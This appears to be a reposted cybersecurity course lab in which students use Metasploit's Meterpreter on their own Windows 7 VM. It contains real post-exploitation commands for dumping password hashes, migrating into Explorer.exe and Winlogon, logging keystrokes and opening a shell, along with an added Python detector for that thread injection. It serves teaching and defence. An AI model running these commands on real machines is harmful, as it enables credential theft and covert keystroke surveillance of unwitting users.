Unit 4: Exploits and Exploiting 4.3 Activity and Discussion Activity: Meterpreter Commands

ACTIVITY: METERPRETER COMMANDS

This activity is ungraded.

Remember: Watch this Demo video. Seeing me complete the activity first will help you understand each of the steps.

System: During this activity, you’ll continue to use Metasploit as shown in the previous activity.

Software: In this activity you will use these applications and resources that are included in the Kali VM:

  • Metasploit
  • Meterpreter

Time: This activity should take you approximately 30 minutes to complete.

Goal

  • To use Meterpreter to gain information and work in a target machine.

Instructions

Note: Hit Enter after each command.

Basic Commands

To start this activity, you should have used Metasploit to configure and deliver an exploit through a payload to a Windows 7 VM running on your machine.

In the Meterpreter command line, enter each of these commands and note the information you receive.

Command | Information you will get…
sysinfo | General information about the compromised system.
hashdump | Password hashes stored on the target machine. These hashes can be used in a brute force attack, a dictionary attack, or a rainbow table attack.
idletime | The amount of time since someone used the keyboard of the compromised system.
ps | A list of every running process on the compromised system. Notice the process ID for the cmd.exe window. Enter kill followed by the process ID for the cmd.exe window. The cmd window will close. Enter ps. Record the PID of explorer.exe, which you will use in the next part of this activity.

Keystroke Recording

Meterpreter’s migrate command lets you move your running code into a process that has interactive access to the compromised system.

Here, you’ll migrate the running payload into the Explorer.exe process owned by the active user. That will let you use the keyscan_start and keyscan_dump commands to log the user's keystrokes.

  1. Enter migrate followed by the PID of Explorer.exe that you recorded earlier.
  2. Enter keyscan_start.
  3. Open up a text editor, and begin to type.
    Be sure to use the arrow keys, the backspace key, and the delete key.
  4. Open up a browser and go to www.edx.org.
  5. Log in with a username of bob and a password of bobpassword.
    NOTE: You will not be able to log in with any of these username/password combinations. They are provided to illustrate the key capture process.
  6. Go to mycourses.rit.edu.
  7. Log in with a username of bob and a password of bobpassword2.
  8. Go to gmail.com.
  9. Log in with a username of bobiscool and a password of bobpassword3.
  10. Enter keyscan_dump. This will dump every keystroke since you initiated the keyscan_start command to the screen.
  11. Enter keyscan_stop.

To capture system login information, migrate the running payload to the Winlogon process. This captures the credentials of all users logging into the system while the machine is running. Rebooting or shutting down the compromised system ends the Meterpreter session.
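
Seen from the defender's side, the migrate step above is a thread injected into Explorer.exe or Winlogon. The following Python script is an added example, not part of the original course material: it assumes Sysmon is logging CreateRemoteThread (Event ID 8) on the Windows VM and that the migration surfaces as such an event. The function names, trusted-path list and sample records are constructed for illustration.

```python
# Added example: flag thread injection into the processes this activity migrates into.
# Records mimic Sysmon Event ID 8 (CreateRemoteThread); every value is constructed.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartModule": "-"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\explorer.exe",
     "StartModule": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\System32\winlogon.exe", "StartModule": "-"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe"},  # not an injection event
    {"EventID": 8, "SourceImage": r"C:\Tools\debugger.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "StartModule": "-"},
]

# Targets taken from the activity text: Explorer.exe (keystrokes), Winlogon (logins).
SENSITIVE_TARGETS = {"explorer.exe": "medium", "winlogon.exe": "high"}
# Assumption: OS binaries under System32 may legitimately create such threads.
TRUSTED_SOURCE_PREFIXES = ("c:\\windows\\system32\\",)


def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_injections(events):
    """Return one finding per remote thread created in a sensitive process."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 8:
            continue
        target = image_name(ev.get("TargetImage", ""))
        source = ev.get("SourceImage", "")
        if target not in SENSITIVE_TARGETS:
            continue
        if source.lower().startswith(TRUSTED_SOURCE_PREFIXES):
            continue
        findings.append({
            "source": source,
            "target": target,
            "severity": SENSITIVE_TARGETS[target],
            # Assumption: "-" means the start address is not inside a loaded module.
            "unbacked_start": ev.get("StartModule", "-") in ("", "-"),
        })
    return findings


if __name__ == "__main__":
    for finding in find_injections(SAMPLE_EVENTS):
        print(finding)
```

The trusted-prefix list is the part to tune per environment; security products and debuggers also create remote threads and will need their own entries.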

Shell Commands

Enter shell. This opens a Windows command line interface that affects the compromised machine.

Execute these networking commands from that interface:

  • Enter ipconfig to see the machine’s network configuration.
  • Enter arp -a to see the machine’s ARP cache.
  • Enter ping 8.8.8.8 to send pings from the host machine to a Google Public DNS server.

With these commands, you can create a text file on the compromised machine:

  1. md bob creates a directory called bob.
  2. dir bob*.* verifies the previous step, showing the existence of the bob directory.
  3. cd bob changes current directory to the bob directory.
  4. echo "Ransomware!" > jonathan.txt writes a message to a dynamically created file.
  5. type jonathan.txt displays the contents of the file.
  6. del jonathan.txt deletes the file.
  7. cd .. moves back up one directory.
  8. rd bob removes the directory.
  9. dir bob*.* verifies the previous step, showing that there’s no bob directory anymore.

After you've finished, answer the Check Your Work questions.

You will continue to use Meterpreter in the Windows 7 VM in the next activity. If you are not continuing now, use the instructions in the activity Using Metasploit to get started again.

Reposted from: https://www.cnblogs.com/sec875/articles/10028579.html
